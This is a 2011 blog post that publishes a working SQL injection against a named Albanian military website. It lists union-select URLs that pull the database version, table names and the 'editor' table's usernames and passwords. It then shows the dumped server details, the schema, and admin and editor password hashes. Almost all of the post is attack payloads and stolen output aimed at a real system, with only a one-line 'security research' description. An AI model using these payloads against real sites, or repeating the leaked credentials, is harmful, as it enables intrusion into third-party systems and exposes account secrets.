Sunday, February 13, 2011

gs.mil.al (Army Forces of Albania) SQL INJECTION VULNERABILITY

POC:
http://www.gs.mil.al/galeri_info.php?idr=&ida=-1+union+select+1,2,3,@@version,5,6--

http://www.gs.mil.al/galeri_info.php?idr=&ida=-1+union+select+1,2,3,group_concat(table_name),5,6+from+information_schema.tables+where%20table_schema=database()--

http://www.gs.mil.al/galeri_info.php?idr=&ida=-1+union+select+1,2,3,group_concat(Username,0x3a,Password),5,6+from+editor--

Host Information

Server = Apache/2.2.17 (EL)
Version = 5.1.52
Powered by = PHP/5.2.16
Attack Type = SQL Union Injection
Current User = gs-site-2007@localhost
Current Database = gs
Supports Union = yes
Union Columns = 6

Url| http://www.gs.mil.al/galeri_info.php?idr=&ida=1

Vuln: http://www.gs.mil.al/galeri_info.php?idr=&ida=1+and+1=0+ Union Select 1 ,2,3, UNHEX(HEX([visible])) ,5,6

Comment: --

Visible Column: 4

Hexed: True

Cookie:

Keyword:

Param:

Database:gs

information_schema
gs
test

Tables:editor
dokumente
downloadcat
editor
gallery
gallery_tema
gjera
gjuha
kontakte
kontakteweb
links
materiali
materiali_orig
menu_tree
nivelrubrike
rubrika

Columns: Table editor
EmriEditor
MbiemriEditor
EmailEditor
Username
Password
Aktive
Niveli
Rezerve

admin:c458ac81e291707ec50c8b9c362cdd63,
editor:fe01ce2a7fbac8fafaed7c982a04e229:demo
quark:fe01ce2a7fbac8fafaed7c982a04e229:demo

About Me

A blog for information security research and development, intended for posting the latest vulnerabilities and weaknesses. Founder darknessn1k0!4

 